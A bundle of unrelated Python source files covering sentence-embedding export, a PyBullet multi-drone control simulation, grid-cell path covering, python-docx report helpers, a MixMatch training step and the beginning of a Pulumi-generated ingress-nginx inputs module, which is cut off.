    Each file ``<title>-layer<N>-<method>.mat`` maps "sentence<i>" to a
    vector whose first element is the sentence's missing-word flag,
    followed by the pooled embedding.
    """
    print("\ncreating " + method + " matrix...")
    for layer_num, layer_vectors in enumerate(arr):
        print("processing LAYER " + str(layer_num + 1) + "...")
        mat_title = "layer" + str(layer_num + 1) + "-" + str(method) + ".mat"
        layer_dict = {}
        for i, embed in enumerate(layer_vectors):
            # Prepend the flag so MATLAB consumers can filter sentences.
            row = [bool_labels[i]]
            row.extend(embed)
            layer_dict["sentence" + str(i + 1)] = row
        scipy.io.savemat(title + "-" + mat_title, mdict=layer_dict)
    return
def get_missing_bools(model, file_name):
    """Return, for every sentence in *file_name*, a flag telling whether
    the sentence contains words missing from the top-50k vocabulary of
    the word model stored at *model* (a torch-saved vocab).
    """
    get_dict_vocab = torch.load(model)
    print("IF ONLY 50k")
    # Restrict the missing-word check to the 50k most frequent entries.
    top_50k_missing = get_missing(get_dict_vocab, file_name, top_50k = True)
    top_50k_missing_dict, top_50k_sentences = get_missing_counts(top_50k_missing, file_name)
    top_50k_sentences_with_missing, top_50k_missing_bools = find_missing_sentences(top_50k_missing_dict, top_50k_sentences, verbose = False)
    print("NUMBER OF TOP 50K MISSING SENTENCES:", len(top_50k_sentences_with_missing))
    return top_50k_missing_bools
def main():
    """CLI entry point: load token embeddings, pool them into sentence
    vectors with all four methods, and save one .mat file per layer and
    method under embeddings/<model-name>/<method>/.
    """
    # get input
    argparser = argparse.ArgumentParser(description="create sentence representations for OpenNMT-py embeddings")
    argparser.add_argument("-num_layers", '--num_layers', type=int, default=4, help="num_layers")
    argparser.add_argument("-word_vocab", '--word_vocab', type=str, help="file path of the word model", required=True)
    argparser.add_argument("-model", '--model', type=str, help="file path of the prediction model", required=True)
    args = argparser.parse_args()
    ### GET MODEL VOCAB DICTIONARY
    sent_file_name = "cleaned_examplesGLM.txt"
    # Model file name without directory or extension; used as output folder.
    without_pt = args.model.split("/")[-1].split(".")[0]
    methods = ['avg', 'max', 'min', 'last']
    if not os.path.exists('embeddings/' + without_pt):
        for method in methods:
            os.makedirs('embeddings/' + without_pt + '/' + method)
    print(without_pt)
    print(args.model)
    print('loading model...')
    vocab = torch.load(args.model)
    # Pool token embeddings into sentence vectors, once per method.
    avg_sentence = process_sentence(vocab, "avg", args.num_layers)
    max_sentence = process_sentence(vocab, "max", args.num_layers)
    min_sentence = process_sentence(vocab, "min", args.num_layers)
    last_sentence = process_sentence(vocab, "last", args.num_layers)
    mats = [avg_sentence, max_sentence, min_sentence, last_sentence]
    # One missing-word flag per sentence, stored alongside each embedding.
    bool_labels = get_missing_bools(args.word_vocab, sent_file_name)
    for i in range(len(methods)):
        save_to_mat("embeddings/" + without_pt + '/' + methods[i] + '/', mats[i], bool_labels, methods[i])
    print("done.")
    return
# Script entry point: only run when executed directly, not on import.
if __name__ == "__main__":
    main()
"""Simulation script for assignment 2.
The script uses the control defined in file `aer1216_fall2020_hw2_ctrl.py`.
Example
-------
To run the simulation, type in a terminal:
$ python aer1216_fall2020_hw2_sim.py
"""
import time
import random
import numpy as np
import pybullet as p
#### Uncomment the following 2 lines if "module gym_pybullet_drones cannot be found"
# import sys
# sys.path.append('../')
from gym_pybullet_drones.envs.CtrlAviary import CtrlAviary
from gym_pybullet_drones.utils.Logger import Logger
from gym_pybullet_drones.utils.utils import sync
from gym_pybullet_drones.envs.BaseAviary import DroneModel
from aer1216_fall2020_hw2_ctrl import HW2Control
DURATION = 30
"""int: The duration of the simulation in seconds."""
GUI = True
"""bool: Whether to use PyBullet graphical interface."""
RECORD = False
"""bool: Whether to save a video under /files/videos. Requires ffmpeg"""
if __name__ == "__main__":
    #### Create the ENVironment ################################
    # Three CF2P drones hovering side by side, 0.3 m apart along x.
    ENV = CtrlAviary(num_drones=3,
                     drone_model=DroneModel.CF2P,
                     initial_xyzs=np.array([ [.0, .0, .15], [-.3, .0, .15], [.3, .0, .15] ]),
                     gui=GUI,
                     record=RECORD
                     )
    PYB_CLIENT = ENV.getPyBulletClient()
    #### Initialize the LOGGER #################################
    LOGGER = Logger(logging_freq_hz=ENV.SIM_FREQ,
                    num_drones=3,
                    )
    #### Initialize the CONTROLLERS ############################
    # One controller per drone, each exercising a different control_type.
    CTRL_0 = HW2Control(env=ENV,
                        control_type=0
                        )
    CTRL_1 = HW2Control(env=ENV,
                        control_type=1
                        )
    CTRL_2 = HW2Control(env=ENV,
                        control_type=2
                        )
    #### Initialize the ACTION #################################
    # Prime every drone's first action as "hold the current position".
    ACTION = {}
    OBS = ENV.reset()
    STATE = OBS["0"]["state"]
    ACTION["0"] = CTRL_0.compute_control(current_position=STATE[0:3],
                                         current_velocity=STATE[10:13],
                                         current_rpy=STATE[7:10],
                                         target_position=STATE[0:3],
                                         target_velocity=np.zeros(3),
                                         target_acceleration=np.zeros(3)
                                         )
    STATE = OBS["1"]["state"]
    ACTION["1"] = CTRL_1.compute_control(current_position=STATE[0:3],
                                         current_velocity=STATE[10:13],
                                         current_rpy=STATE[7:10],
                                         target_position=STATE[0:3],
                                         target_velocity=np.zeros(3),
                                         target_acceleration=np.zeros(3)
                                         )
    STATE = OBS["2"]["state"]
    ACTION["2"] = CTRL_2.compute_control(current_position=STATE[0:3],
                                         current_velocity=STATE[10:13],
                                         current_rpy=STATE[7:10],
                                         target_position=STATE[0:3],
                                         target_velocity=np.zeros(3),
                                         target_acceleration=np.zeros(3)
                                         )
    #### Initialize the target trajectory ######################
    # Cosine sweep along y at a fixed 1 m height, one sample per sim step.
    TARGET_POSITION = np.array([[0, 4.0*np.cos(0.006*i), 1.0] for i in range(DURATION*ENV.SIM_FREQ)])
    TARGET_VELOCITY = np.zeros([DURATION * ENV.SIM_FREQ, 3])
    TARGET_ACCELERATION = np.zeros([DURATION * ENV.SIM_FREQ, 3])
    #### Derive the target trajectory to obtain target velocities and accelerations
    # NOTE(review): a per-step finite difference over dt = 1/SIM_FREQ should be
    # multiplied by SIM_FREQ, not divided by it -- confirm this is intended.
    TARGET_VELOCITY[1:, :] = (TARGET_POSITION[1:, :] - TARGET_POSITION[0:-1, :])/ENV.SIM_FREQ
    TARGET_ACCELERATION[1:, :] = (TARGET_VELOCITY[1:, :] - TARGET_VELOCITY[0:-1, :]) / ENV.SIM_FREQ
    #### Run the simulation ####################################
    START = time.time()
    for i in range(0, DURATION*ENV.SIM_FREQ):
        ### Secret control performance booster #####################
        # if i/ENV.SIM_FREQ>3 and i%30==0 and i/ENV.SIM_FREQ<10: p.loadURDF("duck_vhacd.urdf", [random.gauss(0, 0.3), random.gauss(0, 0.3), 3], p.getQuaternionFromEuler([random.randint(0, 360),random.randint(0, 360),random.randint(0, 360)]), physicsClientId=PYB_CLIENT)
        #### Step the simulation ###################################
        OBS, _, _, _ = ENV.step(ACTION)
        #### Compute control for drone 0 ###########################
        STATE = OBS["0"]["state"]
        ACTION["0"] = CTRL_0.compute_control(current_position=STATE[0:3],
                                             current_velocity=STATE[10:13],
                                             current_rpy=STATE[7:10],
                                             target_position=TARGET_POSITION[i, :],
                                             target_velocity=TARGET_VELOCITY[i, :],
                                             target_acceleration=TARGET_ACCELERATION[i, :]
                                             )
        #### Log drone 0 ###########################################
        LOGGER.log(drone=0, timestamp=i/ENV.SIM_FREQ, state=STATE)
        #### Compute control for drone 1 ###########################
        # Drone 1 tracks the same trajectory offset 0.3 m to the left.
        STATE = OBS["1"]["state"]
        ACTION["1"] = CTRL_1.compute_control(current_position=STATE[0:3],
                                             current_velocity=STATE[10:13],
                                             current_rpy=STATE[7:10],
                                             target_position=TARGET_POSITION[i, :] + np.array([-.3, .0, .0]),
                                             target_velocity=TARGET_VELOCITY[i, :],
                                             target_acceleration=TARGET_ACCELERATION[i, :]
                                             )
        #### Log drone 1 ###########################################
        LOGGER.log(drone=1, timestamp=i/ENV.SIM_FREQ, state=STATE)
        #### Compute control for drone 2 ###########################
        # Drone 2 tracks the same trajectory offset 0.3 m to the right.
        STATE = OBS["2"]["state"]
        ACTION["2"] = CTRL_2.compute_control(current_position=STATE[0:3],
                                             current_velocity=STATE[10:13],
                                             current_rpy=STATE[7:10],
                                             target_position=TARGET_POSITION[i, :] + np.array([.3, .0, .0]),
                                             target_velocity=TARGET_VELOCITY[i, :],
                                             target_acceleration=TARGET_ACCELERATION[i, :]
                                             )
        #### Log drone 2 ###########################################
        LOGGER.log(drone=2, timestamp=i/ENV.SIM_FREQ, state=STATE)
        #### Printout ##############################################
        if i%ENV.SIM_FREQ == 0:
            ENV.render()
        #### Sync the simulation ###################################
        if GUI:
            sync(i, START, ENV.TIMESTEP)
    #### Close the ENVironment #################################
    ENV.close()
    #### Save the simulation results ###########################
    LOGGER.save()
    #### Plot the simulation results ###########################
    LOGGER.plot()
|
from pprint import pprint
from math import floor
from math import sqrt
from uuid import uuid4
### CHANGE THESE VARIABLES TO CHANGE GRID GENERATION
# digits = each point is placed in a box generated from the lat/lon coordinates,
# by rounding down to the nearest digit specified by digits.
# If digits is increased, the box size will decrease.
digits = 3
# buff = if a point is close to the edge of its bounding box within some buff percent,
# another box will be generated next to the point to account for the fact that
# the line is on the edge. Increase the buffer to be more liberal about what counts
# as the edge. As buff goes up, more boxes will be generated
buff = 0.05
# step = points between the start and end of each section of the path are generated by
# stepping through the parameterized line. Decrease the step to intersperse
# more points, which will allow the program to catch more points where the
# line is very close to the edge of the bounding box. Do not increase more than 1.
# Increasing this value will make this program run faster, decreasing it will make
# it run slower.
step = 0.5
# A grid cell has side length 10**-digits; my_floor snaps a coordinate down
# to its cell's lower-left boundary.
ratio = 10 ** digits
my_floor = lambda x: floor(x*ratio)/ratio
def increment(square):
    """Return ((x0, x1), (y0, y1)), the bounds of the grid cell whose
    lower-left corner is *square* (cell side is 1/ratio)."""
    x0, y0 = square
    x1 = (x0 * ratio + 1) / ratio
    y1 = (y0 * ratio + 1) / ratio
    return ((x0, x1), (y0, y1))
def get_adj(square):
    """Return the 8 grid cells surrounding *square* (orthogonal and
    diagonal neighbours), each identified by its lower-left corner."""
    x, y = square
    neighbours = set()
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            if dx == 0 and dy == 0:
                continue
            # Mirror the original exactly: an axis that does not move is
            # left untouched (no re-rounding of the existing coordinate).
            nx = x if dx == 0 else round((x * ratio + dx) / ratio, digits)
            ny = y if dy == 0 else round((y * ratio + dy) / ratio, digits)
            neighbours.add((nx, ny))
    return neighbours
def check_border(point, square):
    """Return *square* plus every neighbouring cell whose shared edge or
    corner *point* lies within the buffer distance of."""
    (x0, x1), (y0, y1) = increment(square)
    # Buffer distance: buff fraction of the cell side, per axis.
    x_buff = ((x1 * ratio - x0 * ratio) / ratio) * buff
    y_buff = ((y1 * ratio - y0 * ratio) / ratio) * buff
    near_left = point[0] < x0 + x_buff
    near_right = point[0] > x1 - x_buff
    near_bottom = point[1] < y0 + y_buff
    near_top = point[1] > y1 - y_buff
    # Corner coordinates of the neighbouring cells.
    x_lo = round((square[0] * ratio - 1) / ratio, digits)
    x_hi = round((square[0] * ratio + 1) / ratio, digits)
    y_lo = round((square[1] * ratio - 1) / ratio, digits)
    y_hi = round((square[1] * ratio + 1) / ratio, digits)
    squares = set()
    squares.add(square)
    # adjacent
    if near_left:
        squares.add((x_lo, square[1]))
    if near_right:
        squares.add((x_hi, square[1]))
    if near_bottom:
        squares.add((square[0], y_lo))
    if near_top:
        squares.add((square[0], y_hi))
    # diagonal
    if near_left and near_bottom:
        squares.add((x_lo, y_lo))
    if near_right and near_top:
        squares.add((x_hi, y_hi))
    if near_left and near_top:
        squares.add((x_lo, y_hi))
    if near_right and near_bottom:
        squares.add((x_hi, y_lo))
    return squares
def cover_path(path):
    """Return the set of grid cells (lower-left corners) covered by the
    polyline *path*.

    path: sequence of {'x': ..., 'y': ...} points.

    For each segment whose endpoints fall in different cells, the start
    and end cells (plus buffered neighbours from check_border) are added,
    then the segment is marched in arc-length steps of ``step/ratio`` and
    every visited cell (plus buffered neighbours) is added as well.
    """
    squares = set()
    for i in range(0, len(path) - 1):
        start = (path[i]['x'], path[i]['y'])
        end = (path[i + 1]['x'], path[i + 1]['y'])
        # Round down to get start and end cells; a cell is uniquely
        # identified by the coordinates of its lower-left corner.
        start_square = tuple(map(my_floor, start))
        end_square = tuple(map(my_floor, end))
        # NOTE(review): segments that begin and end in the same cell are
        # skipped entirely, so that cell is only recorded if some other
        # segment touches it -- confirm this is intended.
        if start_square != end_square:
            squares.update(check_border(start, start_square))
            squares.update(check_border(end, end_square))
            # Parameterize the segment by arc length: f(0) == start,
            # f(dist) == end.
            delta_x = end[0] - start[0]
            delta_y = end[1] - start[1]
            dist = sqrt(delta_x * delta_x + delta_y * delta_y)
            f = lambda t: ((delta_x / dist) * t + start[0],
                           (delta_y / dist) * t + start[1])
            square = start_square
            t = 0
            while t <= dist:
                # Bug fix: ``squares`` is a set, so the original
                # ``squares[square] = []`` raised TypeError on the first
                # iteration; sets are added to, and add() is idempotent.
                squares.add(square)
                t += step / ratio
                point = f(t)
                square = tuple(map(my_floor, point))
                # Also cover neighbouring cells the marched point is close to.
                squares.update(check_border(point, square))
    return squares
|
import os
import re
from datetime import datetime, timedelta
import docx
import csv
from docx import Document
from docx.enum.dml import *
from docx.enum.table import *
from docx.enum.text import *
from docx.oxml.ns import qn
from docx.oxml import OxmlElement
from docx.enum.section import WD_ORIENT
from docx.enum.section import WD_SECTION
from docx.shared import Cm, RGBColor
import pandas as pd
import numpy as np
import main as m
import matplotlib.pyplot as plt
import win32com.client as client
from docx.enum.table import *
#Edited from https://stackoverflow.com/questions/32992457/update-the-toc-table-of-content-of-ms-word-docx-documents-with-python
def update_toc(docx_file):
    """Open *docx_file* in Word via COM, refresh its first table of
    contents, and save the document in place. Requires MS Word (Windows).
    """
    word = client.DispatchEx("Word.Application")
    try:
        doc = word.Documents.Open(docx_file)
        doc.TablesOfContents(1).Update()
        doc.Close(SaveChanges=True)
    finally:
        # Always shut the hidden Word instance down again.
        word.Quit()
        del word
#Edited from https://stackoverflow.com/questions/47666642/adding-an-hyperlink-in-msword-by-using-python-docx
def add_hyperlink(paragraph, text, url):
    """Append a clickable run showing *text* and pointing to *url* to
    *paragraph*; returns the created w:hyperlink XML element."""
    # This gets access to the document.xml.rels file and gets a new relation id value
    part = paragraph.part
    r_id = part.relate_to(url, docx.opc.constants.RELATIONSHIP_TYPE.HYPERLINK, is_external=True)
    # Create the w:hyperlink tag and add needed values
    hyperlink = docx.oxml.shared.OxmlElement('w:hyperlink')
    hyperlink.set(docx.oxml.shared.qn('r:id'), r_id, )
    # Create a w:r element and a new w:rPr element
    new_run = docx.oxml.shared.OxmlElement('w:r')
    rPr = docx.oxml.shared.OxmlElement('w:rPr')
    # Join all the xml elements together add add the required text to the w:r element
    new_run.append(rPr)
    new_run.text = text
    hyperlink.append(new_run)
    # Create a new Run object and add the hyperlink into it
    r = paragraph.add_run()
    r._r.append(hyperlink)
    # A workaround for the lack of a hyperlink style (doesn't go purple after using the link)
    # Delete this if using a template that has the hyperlink style in it
    r.font.color.theme_color = MSO_THEME_COLOR_INDEX.HYPERLINK
    r.font.underline = True
    return hyperlink
#Edited from https://stackoverflow.com/questions/55572685/how-set-direction-of-table-of-content-in-docx-files-uisng-python-docx
def create_Toc(cr_document):
    """Insert a centered 'Table of Contents' heading followed by a Word
    TOC field (heading levels 1-4) and a page break. The field's text is
    populated by Word when the user (or update_toc) refreshes it."""
    cont = cr_document.add_heading('Table of Contents', 8)
    cont.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER
    paragraph = cr_document.add_paragraph()
    run = paragraph.add_run()
    fldChar = OxmlElement('w:fldChar') # creates a new element
    fldChar.set(qn('w:fldCharType'), 'begin') # sets attribute on element
    instrText = OxmlElement('w:instrText')
    instrText.set(qn('xml:space'), 'preserve') # sets attribute on element
    instrText.text = 'TOC \\o "1-4" \\h \\z \\u' # change 1-4 depending on heading levels you need
    fldChar2 = OxmlElement('w:fldChar')
    fldChar2.set(qn('w:fldCharType'), 'separate')
    fldChar3 = OxmlElement('w:t')
    # Placeholder shown until Word evaluates the TOC field.
    fldChar3.text = "Right-click to update field."
    fldChar2.append(fldChar3)
    fldChar4 = OxmlElement('w:fldChar')
    fldChar4.set(qn('w:fldCharType'), 'end')
    # Assemble the begin/instr/separate/end field sequence into the run.
    r_element = run._r
    r_element.append(fldChar)
    r_element.append(instrText)
    r_element.append(fldChar2)
    r_element.append(fldChar4)
    cr_document.add_page_break()
def line_brake(doc, n):
    """Append *n* empty paragraphs to *doc* as vertical spacing.

    NOTE(review): the name is presumably a typo for "line_break"; it is kept
    unchanged because callers elsewhere in the file may reference it.
    """
    # range(n) instead of range(0, n); "_" marks the index as unused.
    for _ in range(n):
        doc.add_paragraph()
def change_orientation(document):
    """Start a new landscape section whose page size is the current size swapped.

    Always sets the new section's orientation to LANDSCAPE; width/height are
    taken from the last existing section with the two dimensions exchanged.
    Returns None (the new section is reachable via ``document.sections[-1]``).
    """
    previous = document.sections[-1]
    landscape_width = previous.page_height
    landscape_height = previous.page_width
    section = document.add_section(WD_SECTION.NEW_PAGE)
    section.orientation = WD_ORIENT.LANDSCAPE
    section.page_width = landscape_width
    section.page_height = landscape_height
def csv2chart(file, doc):
    """Render the CSV file at path *file* as a styled table appended to *doc*.

    The first CSV row becomes the header row; every following row becomes a
    table row. The first column is pinned to 1 cm width (the table otherwise
    keeps the generated layout since autofit is disabled).

    Fix: the original crashed with StopIteration on an empty CSV file; an
    empty file now simply adds no table.
    """
    with open(file, newline='') as csv_file:
        csv_reader = csv.reader(csv_file)
        # Guard against an empty file: next() with a default avoids
        # StopIteration escaping from the function.
        csv_headers = next(csv_reader, None)
        if csv_headers is None:
            return
        csv_cols = len(csv_headers)
        table = doc.add_table(rows=1, cols=csv_cols)
        table.style = 'LightGrid-Accent1'
        table.autofit = False
        # Pin the first column's width; remaining columns keep their defaults.
        table.columns[0].width = Cm(1)
        hdr_cells = table.rows[0].cells
        for i, header in enumerate(csv_headers):
            hdr_cells[i].text = header
        for row in csv_reader:
            row_cells = table.add_row().cells
            for i in range(csv_cols):
                row_cells[i].text = row[i]
#https://github.com/python-openxml/python-docx/issues/113
def convert_to_pdf(filepath: str):
    """Save a PDF of a docx file using the Word COM automation interface.

    The output path is *filepath* with ".docx" replaced by ".pdf".
    Windows-only: requires Microsoft Word (win32com ``client``).

    Fixes: (1) if DispatchEx itself raised, the original's ``finally`` block
    hit a NameError on the undefined ``word`` variable, masking the real
    error; (2) ``except Exception as e: raise e`` was a no-op and is removed.
    """
    word = None
    try:
        word = client.DispatchEx("Word.Application")
        target_path = filepath.replace(".docx", r".pdf")
        word_doc = word.Documents.Open(filepath)
        # FileFormat=17 is wdFormatPDF in the Word object model.
        word_doc.SaveAs(target_path, FileFormat=17)
        word_doc.Close()
    finally:
        # Only quit Word if it was actually started.
        if word is not None:
            word.Quit()
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MixMatch implementation."""
from util.semisup import SemiSup
import tensorflow as tf
class MixMatch(SemiSup):
  """MixMatch."""

  def __init__(self, hparams):
    super().__init__(hparams)
    # MixMatch expects exactly one (weak) labeled augmentation and no strong
    # augmentation; enforce that the configuration matches.
    assert (self.num_augment == 1) and (
        len(self.augment)
        == 1), 'number of labeled data augmentation for {} should be 1'.format(
            self.__class__.__name__)
    assert (self.num_strongaug == 0) and (
        len(self.strongaug)
        == 1), 'number of strong augmentation for {} should be 0'.format(
            self.__class__.__name__)
    # Track per-class accuracy and the model's class-distribution monitor in
    # addition to the metrics registered by the SemiSup base class.
    self.list_of_metrics += ['per_class_acc.train', 'per_class_monitor.model']

  def set_ssl_hparams(self, hparams):
    # MixUp hyperparameters; mixup_beta is also baked into the output file
    # suffix so runs with different betas do not collide.
    self.mixup_beta = hparams.mixup_beta
    self.mixup_prob = hparams.mixup_prob
    self.file_suffix += '_beta{:g}'.format(self.mixup_beta)

  def get_train_step_fn(self, current_dalign_t=None):
    """Train step."""

    @tf.function
    def step_fn(data):
      """Train step for MixMatch model.

      Args:
        data: Tuple of labeled and unlabeled data. Labeled data (data[0]) is an
          (images, label, index) tuple. Unlabeled data (data[1]) is an (images,
          label, index) tuple. Multiple augmented images of the same instance
          are available.
      """
      # Labeled batch (xl, yl) and the weakly-augmented unlabeled views
      # (xu is a list of num_weakaug views, concatenated along the batch dim).
      xl, yl = data[0][0], data[0][-2]
      xu, yu, _ = data[1][:self.num_weakaug], data[1][-2], data[1][-1]
      num_aug = len(xu)
      xu = tf.concat(xu, axis=0)
      replica_context = tf.distribute.get_replica_context()
      if self.reweight_labeled:
        # Inverse-frequency weights from the running data distribution,
        # normalized to sum to num_class (1e-6 guards against division by 0).
        reweight_labeled_weights = 1 / (1e-6 + self.p_data())
        reweight_labeled_weights /= tf.reduce_sum(reweight_labeled_weights)
        reweight_labeled_weights *= self.num_class
      with tf.GradientTape() as tape:
        # MixUp
        # Pseudo-targets are computed from the unlabeled logits (averaged
        # across the num_aug views inside get_pseudo_target).
        logits_u = self.model(xu, training=True)['logits']
        pseudo_target, pseudo_mask = self.get_pseudo_target(
            tf.split(logits_u, num_aug), current_dalign_t=current_dalign_t)
        # Mix the (labeled + unlabeled) batch with itself; labels are one-hot
        # ground truth for labeled examples and pseudo-targets for unlabeled.
        xmix, ymix = self.get_mixed_data(
            x1=tf.concat([xl, xu], axis=0),
            l1=tf.concat([
                tf.one_hot(tf.cast(yl[:, 0], dtype=tf.int32), self.num_class),
                pseudo_target
            ],
                         axis=0),
            x2=tf.concat([xl, xu], axis=0),
            l2=tf.concat([
                tf.one_hot(tf.cast(yl[:, 0], dtype=tf.int32), self.num_class),
                pseudo_target
            ],
                         axis=0),
            beta=self.mixup_beta,
            replica_context=replica_context)
        logits = self.model(xmix, training=True)['logits']
        # Split mixed logits/labels back into the labeled part (first
        # xl.shape[0] rows) and the unlabeled part.
        logits_l, logits_m = logits[:xl.shape[0]], logits[xl.shape[0]:]
        labels_l, labels_m = ymix[:xl.shape[0]], ymix[xl.shape[0]:]
        # Compute supervised loss.
        loss_xe = tf.keras.losses.categorical_crossentropy(
            labels_l, logits_l, from_logits=True)
        if self.reweight_labeled:
          loss_xe *= tf.gather(reweight_labeled_weights,
                               tf.cast(yl[:, 0], tf.int32))
        # Normalize by the global (cross-replica) labeled batch size.
        loss_xe = tf.divide(
            tf.reduce_sum(loss_xe),
            self.cross_replica_concat(loss_xe,
                                      replica_context=replica_context).shape[0])
        # Compute unsupervised loss.
        # pseudo_mask zeroes out low-confidence pseudo-labeled examples.
        loss_xeu = self.get_unsup_loss(
            labels_m, logits_m, mode=self.unsup_loss_type)
        loss_xeu = tf.reduce_sum(loss_xeu * pseudo_mask)
        loss_xeu = tf.divide(
            loss_xeu,
            self.get_unsup_loss_divisor(
                pseudo_mask,
                mode=self.unsup_loss_divisor,
                replica_context=replica_context))
        # Compute l2 weight decay loss.
        loss_wd = self.loss_wd(self.model.trainable_weights)
        # Compute total loss.
        loss = loss_xe + self.weight_decay * loss_wd
        loss = loss + self.weight_unsup * loss_xeu
      grad = tape.gradient(loss, self.model.trainable_weights)
      self.optimizer.apply_gradients(zip(grad, self.model.trainable_weights))
      # EMA update.
      self.ema_update(ema_decay=self.ema_decay)
      # Metric monitor update.
      # Losses are scaled by num_replicas_in_sync so the aggregated metric
      # reflects the global batch value.
      self.metric_update({
          'loss.train': loss * self.strategy.num_replicas_in_sync,
          'loss.xe': loss_xe * self.strategy.num_replicas_in_sync,
          'loss.xeu': loss_xeu * self.strategy.num_replicas_in_sync,
          'loss.wd': loss_wd * self.strategy.num_replicas_in_sync,
          'acc.train': (yl, tf.argmax(logits_l, axis=1)),
          'acc.unlab': (yu, tf.argmax(tf.split(logits_u, num_aug)[0], axis=1)),
          'per_class_acc.train': (yl, tf.argmax(logits_l, axis=1)),
          'per_class_monitor.model': self.p_model(),
          'monitor.mask': tf.reduce_mean(pseudo_mask),
          'monitor.kl_data':
              self.kl_divergence(
                  prob_a=tf.ones([self.num_class]) / self.num_class,
                  prob_b=self.p_data()),
          'monitor.kl_model':
              self.kl_divergence(
                  prob_a=tf.ones([self.num_class]) / self.num_class,
                  prob_b=self.p_model())
      })
      # Update model and data distributions.
      self.p_model.update(tf.stop_gradient(tf.nn.softmax(logits_u)))
      self.p_data.update(
          tf.one_hot(tf.cast(tf.squeeze(yl), dtype=tf.int32), self.num_class))

    return step_fn
|
<filename>sdk/python/pulumi_kubernetes_ingress_nginx/_inputs.py<gh_stars>1-10
# coding=utf-8
# *** WARNING: this file was generated by Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
import pulumi_kubernetes
# Public API of this generated module.
# NOTE: 'ContollerAdmissionWebhooksArgs' and
# 'ControllerAdmissionWebhooksPatchWebhbookJobArgs' are misspelled in the
# upstream schema; the names are kept exactly as generated for compatibility.
__all__ = [
    'AutoscalingBehaviorScalingPolicyArgs',
    'AutoscalingBehaviorScalingArgs',
    'AutoscalingBehaviorArgs',
    'AutoscalingTemplatePodsMetricArgs',
    'AutoscalingTemplatePodsTargetArgs',
    'AutoscalingTemplatePodsArgs',
    'AutoscalingTemplateArgs',
    'AutoscalingArgs',
    'ContollerAdmissionWebhooksArgs',
    'ControllerAdmissionWebhooksCreateSecretJobArgs',
    'ControllerAdmissionWebhooksPatchWebhbookJobArgs',
    'ControllerAdmissionWebhooksPatchArgs',
    'ControllerAdmissionWebhooksServiceArgs',
    'ControllerCustomTemplateArgs',
    'ControllerDefaultBackendServiceArgs',
    'ControllerDefaultBackendArgs',
    'ControllerHostPortPortsArgs',
    'ControllerHostPortArgs',
    'ControllerImageArgs',
    'ControllerIngressClassResourceArgs',
    'ControllerMetricsPrometheusRulesArgs',
    'ControllerMetricsServiceMonitorArgs',
    'ControllerMetricsServiceArgs',
    'ControllerMetricsArgs',
    'ControllerPodSecurityPolicyArgs',
    'ControllerPortArgs',
    'ControllerPublishServiceArgs',
    'ControllerRBACArgs',
    'ControllerRollingUpdateArgs',
    'ControllerScopeArgs',
    'ControllerServiceAccountArgs',
    'ControllerServiceInternalArgs',
    'ControllerServiceNodePortsArgs',
    'ControllerServiceArgs',
    'ControllerTcpArgs',
    'ControllerUdpArgs',
    'ControllerUpdateStrategyArgs',
    'ControllerArgs',
    'KedaScaledObjectArgs',
    'KedaTriggerArgs',
    'KedaArgs',
    'ReleaseArgs',
    'RepositoryOptsArgs',
]
@pulumi.input_type
class AutoscalingBehaviorScalingPolicyArgs:
    """Generated input type: one autoscaling policy (type, value, period).

    All fields are optional; only explicitly supplied values are stored.
    This file is Pulumi-generated — do not edit by hand.
    """

    def __init__(__self__, *,
                 period_seconds: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[int]] = None):
        if period_seconds is not None:
            pulumi.set(__self__, "period_seconds", period_seconds)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter(name="periodSeconds")
    def period_seconds(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "period_seconds")

    @period_seconds.setter
    def period_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period_seconds", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class AutoscalingBehaviorScalingArgs:
    """Generated input type: scaling rules for one direction (policies plus a
    stabilization window). Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 policies: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]] = None,
                 stabilization_window_seconds: Optional[pulumi.Input[int]] = None):
        if policies is not None:
            pulumi.set(__self__, "policies", policies)
        if stabilization_window_seconds is not None:
            pulumi.set(__self__, "stabilization_window_seconds", stabilization_window_seconds)

    @property
    @pulumi.getter
    def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]]:
        return pulumi.get(self, "policies")

    @policies.setter
    def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]]):
        pulumi.set(self, "policies", value)

    @property
    @pulumi.getter(name="stabilizationWindowSeconds")
    def stabilization_window_seconds(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "stabilization_window_seconds")

    @stabilization_window_seconds.setter
    def stabilization_window_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "stabilization_window_seconds", value)
@pulumi.input_type
class AutoscalingBehaviorArgs:
    """Generated input type: scale-up and scale-down behavior settings.
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 scale_down: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']] = None,
                 scale_up: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']] = None):
        if scale_down is not None:
            pulumi.set(__self__, "scale_down", scale_down)
